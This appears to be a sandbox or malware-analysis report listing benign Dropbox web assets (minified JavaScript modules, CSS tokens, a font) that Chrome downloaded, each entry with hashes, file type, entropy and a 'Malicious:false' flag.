                                                    SHA-256:407881C9106BEF52F6F4FE354488E31558D4D88F2A3BF2F2E8D919C35F62C9EB
                                                    SHA-512:CFAA91DA7F071C8CF9A4ADE3A434062ED2AF292ED50254396562D35B0F994381EC748DE985C520486BFA2DF83086BAD4A633DCFA8C7389DD9EC6EF8F31A639BC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-illustrations/index.web-vflgMzehb.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-illustrations@3.3.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-Theme--bright,:root{--color__illustration__inverse__dynamicline:#f7f5f2;--color__illustration__lightline:#f7f5f2}.dig-Theme--dark{--color__illustration__inverse__dynamicline:#1e1919}.dig-Mode--bright,.dig-Theme--bright,:root{--color__illustration__dynamicline:#1e1919}.dig-Mode--dark,.dig-Theme--dark{--color__illustration__dynamicline:#f7f5f2}.dig-Illustration{color:var(--color__illustration__dynamicline);height:100%;width:100%}.dig-Illustration.dig-Illustration--inverse{color:var(--color__illustration__inverse__dynamicline)}.dig-Illustration-spot{min-height:200px}.dig-Illustration-hero{min-height:338px}.di
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (30418)
                                                    Category:dropped
                                                    Size (bytes):30523
                                                    Entropy (8bit):5.512536656286713
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B43D22765DD68C7DAF8C67E2097FC306
                                                    SHA1:370F21E5562B005C48BB2526C1C8B3DB4D8ACDF1
                                                    SHA-256:D67A6086F23C6864E8B50C5A89538766B0A37A5CF75328E0B1C4F1BA8B13A862
                                                    SHA-512:EF69455917A8BAD84A8B7F96167FDC9D5B262A8E620F04D7873306A5EEB1A94026076AECC4FDAA0D94CA0B71262A49F043C0298A9772E1D0A65C541CA745447D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_i18n"],(function(e,t){"use strict";var a,E,_,s,i;e.UEStateType=void 0,(a=e.UEStateType||(e.UEStateType={})).Ready="Ready",a.ShowStep="ShowStep",a.Finished="Finished",e.UEEffectEventType=void 0,(E=e.UEEffectEventType||(e.UEEffectEventType={})).Activate="Activate",E.Deactivate="Deactivate",E.EffectReady="EffectReady",E.UpdateRect="UpdateRect",e.UEErrorType=void 0,(_=e.UEErrorType||(e.UEErrorType={})).EFFECT_TARGET_NOT_FOUND="effect_target_not_found",_.REDIRECT_FAILED="redirect_failed",e.UEEffectType=void 0,(s=e.UEEffectType||(e.UEEffectType={}))[s.Spotlight=0]="Spotlight",s[s.Pulsar=1]="Pulsar",s[s.ToolTip=2]="ToolTip",s[s.Modal=3]="Modal",e.UESpotlightSize=void 0,(i=e.UESpotlightSize||(e.UESpotlightSize={}))[i.Small=1]="Small",i[i.Medium=2]="Medium",i[i.Large=3]="Large",i[i.XLarge=4]="XLarge";var o,r,A,n,l,c;function d(e){return{class:"onboarding",action:"view",object:"guided_tour",properties:e}}function u(e){return{class:"onboarding",action:"select",object:"
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43308, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):43308
                                                    Entropy (8bit):7.995084572292543
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:93B6F18EC99BCB7C3FA7EA570A75E240
                                                    SHA1:60B9E3062FE532CBC18B897FAC542C56A03544C7
                                                    SHA-256:43693F7BDD6146E783FAB3F75BA0A51AA3CF9530ADBF790DBD686FC8A17AA3DB
                                                    SHA-512:AC1A9398B74EB75AC4D52B9A9054A1ADD5A836F2572B99307851A0BB6D93288A13199E06E5DF4F1391209403BF775C9235A679BD081CA7F62B7752ED0FA691C6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflk7bxjs.woff2
                                                    Preview:wOF2.......,...............B.......................d.......`..\....a..... ..R.....6.$..x..~.. .....|..5[r.......bJU..T...^.Ui5.$..c.OI...(...V.%......... ........"..]..$m+.X..........'..p..".Y...q..f.......B[........tjS.6..ZF.V.'8..]L.;f.....p...H.JtYQ.r.......U..v.F.....M..L.Js... ....j)o3/...L.r...%....('......O......7.a..&..z.!/.w.%.....p.P.o..#.....$..~.&r...=.a;.K......RE.....U..F..M..ARd.c.:........Ji..z.X].&..6..2Y.dM..6...8`I....T..BqPc.W.].......q......lG\.....{.j..|.Ab.s.C...q...w.9*...j`. F.a4b..o..?:......~.........Al;...~n=.(.=b.cQlc...+..V.2..J..........wx.Y.q.UxQF....JQ.{...D"PA...Dx...^........].!.......{'.#..I.P...R........p....$K.%Y..!.n..,d..sO...(O@.R...q.(...t:.T....){*p1w..Pc..V(._... t|.....rm....ed%2....D"O"OrM.\....z+.=U..QL.qK...V....Ckw($..........mH..0...v......H=.Y.|.5.~.3......b.g..X..M.R..Q...UZ.b.lV..-.$#Q..]?1[....*O.:.&74.]l...H.W.n.l.?..-.K.*r......Z.W..<..HG.c...N...2..V.;..a.....`.T..q.`#...?r...T.Ak....y.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1417)
                                                    Category:dropped
                                                    Size (bytes):1476
                                                    Entropy (8bit):5.14115543730279
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:81282218FF3331EFCE0B1953C93480A6
                                                    SHA1:CA812A879D62C80C232F300DEA5A9D8D9BA6C8BC
                                                    SHA-256:172A27FCFFEE8E2166A493084C45599393EAD425F5AAF11215684EA315174BE1
                                                    SHA-512:5E6E8DF82439630C7A11F6F9AAADA1F02D7ACE9D7FC13E818E613F1DBA4124B580589AB63C6B4A5EF2E0D674E69D5BEF1E9CCB7DFEA6960D2CC943911ACBF136
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_folder_dialog_constants","./e_core_exception"],(function(e,r,n,t){"use strict";e.getFolderContents=function(e,n){const t={folder:n};return r.WebRequestOref({url:"/browse_util/tree_view_folders",type:"POST",subject_user:e.id,data:t,dataType:"json",skipNotifyError:!0})},e.getFolderContentsAPIv2=async function(e,n,s,o){var i;const a=new r.DefaultUserApiV2Client(e);try{const e=await r.GetFilesRoutes(a).rpc("list_subfolders",{path:n,max_height:s,limit_sub_folder_count:o},{}),t=[];return(e.subfolder_entries||[]).forEach((e=>{const r=e.folder_metadata;let n=!1,s=!1,o=0;r.sharing_info&&(n=r.sharing_info.read_only||!!r.sharing_info.no_access,s=!!r.sharing_info.no_access,void 0!==r.sharing_info.shared_folder_id&&(o=parseInt(r.sharing_info.shared_folder_id,10))),t.push({path:r.path_display||"",has_subdirs:e.has_subfolders||!1,icon:r.icon||"",read_only:n||!1,contained_ns:e.contained_ns||0,target_ns:o,no_access:s,is_encrypted:void 0!==
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1308)
                                                    Category:dropped
                                                    Size (bytes):1387
                                                    Entropy (8bit):5.143003264281274
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B2D44935345C1A45953BFB726C0BD83A
                                                    SHA1:298B87A18B346F8EA9C0026C9F103E6FF1A13854
                                                    SHA-256:B8B6CEE7821B88EBA36BF94F9E3C7138DD8159BDA9A761B4FC5ED3D0CDE083C6
                                                    SHA-512:6F909DDB2AA0E3D0811F373F5BCF7259406FFE29009D973FA23057B8C53A8D05F316A9EE3B3F5342C98409C9D3A8B434D18033F75B36D9C6500191BE2C061199
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_core_data_ui","./c_core_utils_is_text_preview_on","./c_file_viewer_toolbar_utils","./c_react-redux_hooks_useDispatch","./c_dig-icons_assets_ui-icon_line_person-circle","./c_dig-icons_assets_ui-icon_line_member-transfer"],(function(e,t,r,i,n,c,l,s,o,a){"use strict";function u(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var i=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,i.get?i:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var _=u(t);const f=({variant:e})=>{const{fileViewerId:t}=i.useFileViewerContext(),u=i.useFileViewerSelector(i.getCurrentPreviewKey,t),f=s.useDispatch(),d=r.useIntl(),b=n.useIsFullscreen(),g=i.useStabilizedCallback((()=>{const e={fileViewerId:t,previewKey:u,actionContext:i.UserActionContext.PreviewToolbar};f(b?c.exitFullScreen(e):c.enterFullScreen(e))})),p=b?
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (630)
                                                    Category:downloaded
                                                    Size (bytes):718
                                                    Entropy (8bit):5.131404741036383
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0F638EAD2BA5028FA76B9CFFEF86D3F6
                                                    SHA1:033C24A2522F6EF21FB202B40B4F648D6900BF3C
                                                    SHA-256:0E2C65E0558996178361F467C4F55109E6FB39B4757128379785C57E67A33C75
                                                    SHA-512:FB1C6CD8A4220B72EF7AE399D07ACF94FEBB1A973910B6180F9676B6D8B886A1A827A170EF0072D5AFA14E5228AD1CCE07FB7100A602AFA1D73F5EC5E5B0B2F1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_views_copy_link_mini_modal_after_display_utils-vflD2OOrS.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","react"],(function(i,a,e,n){"use strict";a.getShowCopyLinkMiniModalCallback=async()=>(await e.loadAfterDisplay((async()=>{const{CopyLinkMiniModal:a}=await new Promise((function(a,e){i(["./c_views_copy_link_mini_modal_copy_link_mini_modal.after-display"],a,e)}));return{default:a.show}}))).default,a.useShowCopyLinkMiniModalCallback=()=>e.useAfterDisplayPassthroughCallback({importer:async()=>new Promise((function(a,e){i(["./c_views_copy_link_mini_modal_copy_link_mini_modal.after-display"],a,e)})).then((({CopyLinkMiniModal:i})=>({default:{fn:i.show}})))})}));.//# sourceMappingURL=c_views_copy_link_mini_modal_after_display_utils.js-vflERfEo6.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2214)
                                                    Category:dropped
                                                    Size (bytes):2292
                                                    Entropy (8bit):5.365443522803073
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AE5A6FCA117280621FD7C9C68DF29AE3
                                                    SHA1:6C7403F20A7AABB41229DB0F1AD987B9272FE33B
                                                    SHA-256:A4341E0B69C0ED9720B25F39B2EE0774E506621B7A6C6309CDC15E40BDDC7DCD
                                                    SHA-512:55E5A37C22C9E1996C4ACC34FB33E30EAA2EAFE9525284603A398A5916450F512AB1E657D723163E5441E46BB0404DA2E4975FE76A839CCD821AB9A65BB38E56
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_action_bar_action_bar_strings","./e_file_viewer_static_scl_page_folder","./c_file_viewer_action_plugins_titlebar_button","./c_file_viewer_preview_tour_preview_tour_configs","./c_action_plugins_conversion_action_conditions","./c_pap-events_sign_save_signature_doc","./c_file_viewer_api_navigation","./c_core_data_ui","./c_file_viewer_comments2_utils","./c_dig-icons_assets_ui-icon_line_passwords"],(function(e,i,t,o,n,a,r,_,c,l,s,d){"use strict";function u(e){return e&&e.__esModule?e:{default:e}}var C=u(i);const S=e=>!(e===o.SDKPreviewSurface.BACKUP||e===o.SDKPreviewSurface.SHARED_COLLECTION),m=e=>{const i=l.useRightSidebarId()===_.COMMENTS_PLUGIN_ID,t=c.useCloseSidebarCallback(_.COMMENTS_PLUGIN_ID,e),o=c.useSetRightSidebarCallback(_.COMMENTS_PLUGIN_ID,e),n=C.default.useCallback((()=>{i?t():o()}),[i,t,o]);return{isRightSidebarComments:i,handleClick:n}},T={shouldShowForPreviewType:s.shouldShowCommentsForPreviewType,filterValidFile:e=>r.isCloudDoc(e)?void 0:e,fi
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3784)
                                                    Category:downloaded
                                                    Size (bytes):3847
                                                    Entropy (8bit):5.516813675776933
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BCC26BB3CFBEF1256D7D2B47B093EB78
                                                    SHA1:73F119B2951B53002FFF371D764A6244E53F7ABF
                                                    SHA-256:EFA56BD9E130F0A9984513D923182D5DC5F53459A30ECABC67358747347B66BD
                                                    SHA-512:06457D33BDD6B0E9BFFECCCE0F306D954ED3B113FDEFADD6ECDC9E3D7D467C38358EA424DE321E2E895B468E3BB395307108DA13FB0F0490476BD722A69B91D3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_search_search_helpers-vflvMJrs8.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./e_core_exception","./c_api_v2_routes_folders_info_provider","./c_ts_utils"],(function(e,t,a,E,D,o){"use strict";var s,r,n,i,S,A,L,c,_,I,O,R;!function(e){e.EMPTY_STATE_EXPERIMENT="empty_state_experiment",e.SEARCH_EMPTY_STATE="search_empty_state",e.SEARCH_RESULTS_PAGE="search_results_page",e.SERP_MORE_FILTERS_MODAL="search_results_page_more_filters_modal",e.SERP_TOP_RIGHT_SORT="search_results_page_top_right_sort"}(s||(s={})),function(e){e.EMPTY_STATE_SERP="empty_state_serp",e.SUGGESTIONS_DROPDOWN="suggestions_dropdown"}(r||(r={})),function(e){e.LOADING="LOADING",e.LOADED="LOADED",e.DISMISSED="DISMISSED",e.FAILED="FAILED"}(n||(n={})),function(e){e.LOADING="LOADING",e.LOADED="LOADED",e.DISMISSED="DISMISSED",e.FAILED="FAILED"}(i||(i={})),function(e){e.LOADING="LOADING",e.LOADED="LOADED",e.DISMISSED="DISMISSED",e.FAILED="FAILED"}(S||(S={})),function(e){e.LOADING="LOADING",e.LOADED="LOADED",e.DISMISSED="DISMISSED",e
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (698)
                                                    Category:downloaded
                                                    Size (bytes):750
                                                    Entropy (8bit):4.966895654160792
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A68485DC6CCF936B08AAB8868453918B
                                                    SHA1:4CCE8BD7B172D3D856DC4347190814E68B4CD19A
                                                    SHA-256:DCAA4D57C982F9AD501E109E9396E9E178159AF013C70406456782E7C2C5F4FE
                                                    SHA-512:10A8B5A394CEA61755D2A9033EC5A7F5BC571B2610A2ECD0B3CB20DEE62E73C8E5A85A146BE4225844001FCF9E1DC4681178DE6BB32750E10514E5F44F794B10
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_viewer_hoc-vflpoSF3G.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,t,r){"use strict";function n(e){return e&&e.__esModule?e:{default:e}}var i=n(t);e.withActiveUser=function(e,t){const n=n=>{const{user:u,isLoading:l}=r.useMustGetActiveUser(t),a={...n,user:u};return l?null:i.default.createElement(e,{...a})};return e=>i.default.createElement(r.QueryClientProviderWrapper,{isSilent:!0},i.default.createElement(n,{...e}))},e.withViewer=function(e,t){const n=n=>{const{viewer:u,isLoading:l}=r.useViewer(t),a={...n,viewer:u};return l?null:i.default.createElement(e,{...a})};return e=>i.default.createElement(r.QueryClientProviderWrapper,{isSilent:!0},i.default.createElement(n,{...e}))}}));.//# sourceMappingURL=c_viewer_hoc.js-vflUJ19sr.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2170)
                                                    Category:dropped
                                                    Size (bytes):2251
                                                    Entropy (8bit):5.178557675727836
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8A2F09EDDB3E1B2FB7B696D0CC046AA3
                                                    SHA1:DFA285FA022CCC9B5EFD13BFC899AA849D24346B
                                                    SHA-256:B1AA9D3B9DBD1E0D072A910B2A4AE3BE9CA41D21A75BF2170E59E18F9B35DE3B
                                                    SHA-512:51A4C76F1531FE625BD2EF21A8110DE18E40B22C0B3A26182B22D1E3926418BB6C96DA20074B4148AA0DDDB162DFCB000FF05B5C571F11FC78283E80046F39F4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=c(t);e.PdfLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m15.47 4.659 1.37 1.371c.42.422.657.994.659 1.59V9.5H16V8h-2.5V5.5h-7v13H16V17h1.5v3H5V4h8.879a2.237 2.237 0 0 1 1.59.659Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M8.584 13.893h.17c1.084 0 1.722-.346 1.722-1.48 0-1.05-.55-1.413-1.628-1.413H7.5v4.208h1.084v-1.315Zm.242-.863h-.242v-1.194h.253c.374 0 .56.127.56.594 0 .44-.22.6-.571.6ZM11.5 11v4.208h1.178c1.237 0 1.806-.76 1.806-2.057 0-1.49-.57-2.15-1.801-2.15H11.5Zm1.145 3.394h-.082v-2.59h.082c.412 0 .705.296.705 1.336 0 .957-.287 1.254-.705 1.254Zm
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (864)
                                                    Category:downloaded
                                                    Size (bytes):931
                                                    Entropy (8bit):5.207431098151199
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:281A66B793E31F10E4803684A6C85A27
                                                    SHA1:9E30EEBA17E16BFFAFCDA26B5A14B71B8906FF93
                                                    SHA-256:3BFF79915489C38E1964045182C5854D311EC3C376DB034A9B76963BCC6F26D8
                                                    SHA-512:64CBAC7239843F0B22D0BA3419438A8A2BCB59C0F75CE795C1461B689ECCE6AE07F333683C0EC004D1D439AAFAFF54E91E529ED78431029A9D3E329DA3C16476
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_toolbar_utils-vflKBpmt5.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_file_viewer_hooks_use_mouse_active"],(function(e,t,r,i){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var i=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,i.get?i:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var a=n(t);const o=({label:e,onClick:t,icon:i,disabled:n,variant:o})=>a.createElement(r.IconButton,{variant:null!=o?o:"transparent","aria-label":e,onClick:t,disabled:n},a.createElement(r.UIIcon,{src:i,width:"20px",height:"20px"}));o.displayName="ToolbarIcon";e.ToolbarIcon=o,e.isToolbarIconsOnly=e=>e===i.FileViewerBreakpoint.MD||e===i.FileViewerBreakpoint.SM,e.isToolbarOptimizationExperimentEnabled=e=>!!e&&["V1","V2"].includes(e)}));.//# sourceMappingURL=c_file_viewer_toolbar_utils.js-vfl_dvi8r.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (26718)
                                                    Category:downloaded
                                                    Size (bytes):26863
                                                    Entropy (8bit):5.318104350882594
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:280269AA51983D34EE7163EDE6A77813
                                                    SHA1:892AA0C6E8397F072D3CABD66B38F1FEA9AFF1F2
                                                    SHA-256:1CF026FF2A5523CB21675C9E52F815BF3BFE29BDDD98098558B38C0A64E017B6
                                                    SHA-512:30D40EEB3A1D0A78EAF5CB6AD42DA9EE35644D328E61F69F06AFE8A8F7DD4651D2A4C9A0C7761BCDF3B1276D850218071D56FAE2280961FAF18D6FC4080CFE9E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/alameda_bundle/alameda_bundle_chrome_en-vflKAJpql.js
                                                    Preview:/*! For license information please see alameda_bundle_chrome_en.js.LICENSE.txt */.(()=>{var __webpack_modules__={968:(__unused_webpack_module,exports)=>{(function(){var requirejs,require,define;(function(global,Promise,undef){if(!Promise)throw new Error("No Promise implementation available");var topReq,dataMain,src,subPath,bootstrapConfig=requirejs||require,hasOwn=Object.prototype.hasOwnProperty,contexts={},queue=[],currDirRegExp=/^\.\//,urlRegExp=/^\/|\:|\?|\.js$/,commentRegExp=/\/\*[\s\S]*?\*\/|([^:"'=]|^)\/\/.*$/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,slice=Array.prototype.slice;if("function"!=typeof requirejs){var asap=Promise.resolve(void 0);requirejs=topReq=newContext("_"),"function"!=typeof require&&(require=topReq),topReq.exec=function(text){return eval(text)},topReq.contexts=contexts,define=function(){queue.push(slice.call(arguments,0))},define.amd={jQuery:!0},bootstrapConfig&&topReq.config(bootstrapConfig),topReq.isBrowser&&
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5525)
                                                    Category:downloaded
                                                    Size (bytes):5602
                                                    Entropy (8bit):5.2761338593013365
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:16A37F9DDD3EB63FD17932F9E941BB44
                                                    SHA1:EBEB498DB02BB3A4AAE9D923EEC99C072B12C147
                                                    SHA-256:3A48B800031C422657AA4CCCCECBD99A5A6E7B246098FE782BA345916B281D70
                                                    SHA-512:40FBF645DA40CF3A463579C807DAB748D86C4AAAD1F1FDEFA6402108F1C7AF84B372B29CB27C7049B5223ECED04D68C386826130AB2A1F8ACBBD7F4D06D670A8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_toolbar_toolbar_holder2-vflFqN_nd.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./c_core_data_ui","./c_core_utils_is_text_preview_on","./c_file_viewer_hooks_use_mouse_active","./c_file_viewer_toolbar_utils","./c_react-use_useEffectOnce","./c_react-redux_hooks_useDispatch"],(function(e,t,a,i,r,n,o,_,l,s){"use strict";function d(e){return e&&e.__esModule?e:{default:e}}var c=d(a);t.injectInternalStyle("/static/js/file_viewer/toolbar/action_bar.module.out-vfl6ZzEe6.css",(e=>"._action-bar_1ywq1_1{align-items:center;display:flex;flex:1 1 0;justify-content:space-between;min-width:0}._action-bar_1ywq1_1>*{flex-grow:0;flex-shrink:0}._action-bar-buttons_1ywq1_14{align-items:center;display:flex}._action-bar-button-dig-override_1ywq1_19{font-family:var(--type__body__standard--fontfamily);font-size:var(--type__body__standard--fontsize);font-weight:var(--type__body__standard--fontweight);letter-spacing:0;line-height:var(--type__body__standard--lineheight)}._action-bar-button-icon_1ywq1_27{displa
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1016)
                                                    Category:dropped
                                                    Size (bytes):1067
                                                    Entropy (8bit):5.011922435337642
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CBF85129D9B34EDD644E5A274A95F1E3
                                                    SHA1:D4E74A340C4CFCB8701BC60EFC236EC66BAA99FA
                                                    SHA-256:B2B372B71137E3C03625A46661D5C72C954133A77FCFD3502E5786E8A337A24C
                                                    SHA-512:8B0C667B0CC8E6FE7AA6BB79F42ED7ED23F7CB5EA206B231778C5B00FE5CB1BFCEEAA652AAF2D120097CF42B804F37510D653E13BC324D5C7BFBAEACD21642DB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./e_edison","./c_core_notify"],(function(s,t,e,r,i){"use strict";function a(s){return s&&s.__esModule?s:{default:s}}var p=a(e);class o extends p.default.Component{componentDidMount(){i.require_css({web:"/static/metaserver/static/css/sprites/web_sprites-vflwRzO2P.css",teams:"/static/metaserver/static/css/sprites/teams_sprites-vflnszfW9.css",business:"/static/metaserver/static/css/sprites/business_sprites-vflVZxy2R.css"}[this.props.group])}render(){const s=this.props.alt||"";return p.default.createElement("img",{className:t.cx("sprite",`sprite_${this.props.group}`,`s_${this.props.group}_${this.props.name}`,this.props.className),src:r.static_url("/static/metaserver/static/images/icons/icon_spacer-vflN3BYt2.gif"),"data-src":this.props["data-src"],onClick:this.props.onClick,onDragStart:this.props.onDragStart,onMouseDown:this.props.onMouseDown,alt:s,title:this.props.title,tabIndex:this.props.tabIndex})}}o.displayName="Sprite
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4716)
                                                    Category:downloaded
                                                    Size (bytes):4808
                                                    Entropy (8bit):5.081025742981816
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:618EEAE7721C1D16C2E93FD17CF9CD12
                                                    SHA1:26CBE3C2E640FFC451420D771A14266589E2DC1E
                                                    SHA-256:9A3450A4E77623449132B550A1F6D0FA3D4BB35397D39F6999FC04A82C9728CF
                                                    SHA-512:1FAF31E51A83ACA30A87BC9B8A223A993A2902A68CD6088342E8ED66DCAA2F163608D2929CC47E3ADEF68B654773D7CD6AD941E1D7A8518A9C43467340C8B282
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_sharing_sharing_pap_logging_send_share_invite_util-vflYY7q53.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,i){"use strict";function n(e){return{class:"share",action:"send",object:"share_invite",properties:e}}const o=(e,n)=>{const o=e&&e.ext(),t=(null==e?void 0:e.filename())||(null==e?void 0:e.displayPath())||(null==n?void 0:n.name);return o||(t?i.getFileExtensionFromFileName(t):void 0)},t=e=>{const i={};for(const n in e)null===e[n]?i[n]=void 0:i[n]=e[n];return i};e.PAP_Send_ShareInvite=n,e.getPAPShareFolderModalProps=e=>({nsId:e.contentInfo().extras.targetNsId||void 0,numRecipients:e.recipientTokens().length||0,accessLevel:e.recipientAccess(),isEveryoneGroupAdded:e.recipientTokens().some((i=>i.group_id===e.contentInfo().extras.autoTeamGroupId)),areManualGroupsAdded:e.recipientTokens().some((i=>i.group_id&&i.group_id!==e.contentInfo().extras.autoTeamGroupId)),areUsersAdded:e.recipientTokens().some((e=>e.email||e.dbx_account_id)),hasUntokenizedInput:0!==e.recipientRawInput().length}),e.inbandShareResponseToErrorEnum={unde
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (55096)
                                                    Category:downloaded
                                                    Size (bytes):55476
                                                    Entropy (8bit):4.944924198579946
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A9C53D99825469261E2396DF2260ECAD
                                                    SHA1:509BA7C7C5931AFE36B940D167B33CC4446243D4
                                                    SHA-256:5BCCDCCE2471D5262931B52F89B9D952106C49C849BFDB4FCA5C68F6C29D6725
                                                    SHA-512:93155CA726E306D242EA5EE80AB7E23224B50D458F615272C20F5306F0B98931D8CFA7AF0C784F560DF6AB28291098314FAC660CF9D21383ECEAAE1B418171DF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/tokens-vflqcU9mY.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-components@20.8.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-Mode--bright,:root{--scheme__color:light;--scheme__inverse__color:dark;--spacing__base_unit:8px;--spacing__unit--0_5:4px;--spacing__unit--1:8px;--spacing__unit--1_5:12px;--spacing__unit--2:16px;--spacing__unit--2_5:20px;--spacing__unit--3:24px;--spacing__unit--4:32px;--spacing__unit--5:40px;--boxshadow__elevation1:0px 8px 32px rgba(30,25,25,.03),0px 8px 16px rgba(30,25,25,.03),0px 4px 8px rgba(30,25,25,.03),0px 2px 4px rgba(30,25,25,.03),0px 1px 2px rgba(30,25,25,.03);--boxshadow__elevation2:0px 16px 80px rgba(30,25,25,.03),0px 32px 48px rgba(30,25,25,.03),0px 16px 32px rgba(30,25,25,.03),0px 8px 24px rgba(3
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                    Category:downloaded
                                                    Size (bytes):4286
                                                    Entropy (8bit):3.6767668884768048
                                                    Encrypted:false
                                                    SSDEEP:
